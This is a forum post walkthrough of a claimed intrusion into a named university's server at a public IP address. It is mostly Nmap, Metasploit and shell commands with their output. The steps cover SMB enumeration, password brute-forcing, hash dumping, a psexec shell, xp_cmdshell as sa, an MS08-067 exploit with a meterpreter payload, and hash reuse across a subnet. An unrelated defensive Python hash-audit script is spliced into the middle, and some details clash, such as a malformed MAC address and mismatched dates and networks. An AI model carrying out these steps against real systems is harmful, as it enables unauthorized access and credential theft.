nmap+msf intrusion into Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain the users' passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
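As an added example (my code, not part of the original post and not nmap's), a small Python audit that reads smb-pwdump output like the block above and reports what the hash format itself reveals: blank passwords, accounts for which an LM hash is still stored, and an LM upper half equal to the empty-block constant AAD3B435B51404EE, which marks a password of 7 characters or fewer. The sample input is the four result lines from the scan above.

```python
import re

# The LM hash is computed over two independent 7-character halves of the
# password; an empty half always hashes to this constant.  When it appears as
# the upper half, the password is at most 7 characters long; when both halves
# are this constant, no LM hash is stored for the account.
EMPTY_LM_HALF = "AAD3B435B51404EE"
NO_PASSWORD = "NO PASSWORD"

# Matches "user:rid => LMHASH:NTHASH" with or without nmap's "| " / "|_" prefix.
LINE_RE = re.compile(
    r"^\|?_?\s*(?P<user>[^:\s]+):(?P<rid>\d+)\s*=>\s*(?P<lm>[^:]+):(?P<nt>.+)$"
)

# Sample input: the smb-pwdump result lines from the scan output above.
SAMPLE = """\
Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""

def parse_pwdump(text):
    """Extract (user, rid, lm, nt) tuples from smb-pwdump script output."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append((m["user"], int(m["rid"]), m["lm"].strip(), m["nt"].strip()))
    return entries

def assess(lm, nt):
    """Return the weaknesses one account's hash pair reveals (empty list if none)."""
    if lm.startswith(NO_PASSWORD) or nt.startswith(NO_PASSWORD):
        return ["blank password"]
    findings = []
    lm = lm.upper()
    if lm != EMPTY_LM_HALF * 2:
        findings.append("LM hash stored")
        if lm[16:] == EMPTY_LM_HALF:
            findings.append("password is 7 characters or fewer")
    return findings

def audit(text):
    """Map each account name to its list of findings."""
    return {user: assess(lm, nt) for user, _rid, lm, nt in parse_pwdump(text)}

if __name__ == "__main__":
    for user, findings in audit(SAMPLE).items():
        print(f"{user:16s} {', '.join(findings) or 'ok'}")
```

An LM field equal to the doubled constant is reported as clean on the LM axis, because that is what a host with LM hash storage disabled emits.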
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // exploit the ms08-067 vulnerability against the target machine from msf
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the obtained hash to attempt logins across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful: a simple msf+nmap attack~~